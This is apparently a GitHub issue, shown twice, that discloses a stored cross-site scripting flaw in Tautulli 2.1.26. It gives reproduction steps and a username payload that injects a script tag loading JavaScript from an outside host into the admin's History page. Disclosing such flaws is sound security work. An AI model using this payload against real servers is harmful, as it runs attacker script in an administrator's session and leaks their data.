What you did?
I changed my Plex username to geeknik"><script src=https://zed.xss.ht></script>.
What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.
What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.
How can we reproduce your issue?
Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.
The text was updated successfully, but these errors were encountered:
Version:
2.1.26
What you did?
I changed my Plex username to
geeknik"><script src=https://zed.xss.ht></script>.What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.
Lines 112-128 are vulnerable:
https://github.com/Tautulli/Tautulli/blob/56a91de2c4ff0fdd8fbdff4dd7d7677bd16a4b28/data/interfaces/default/history.html#L112
Here we can see how it is reflected:
What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.
How can we reproduce your issue?
Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.
The text was updated successfully, but these errors were encountered: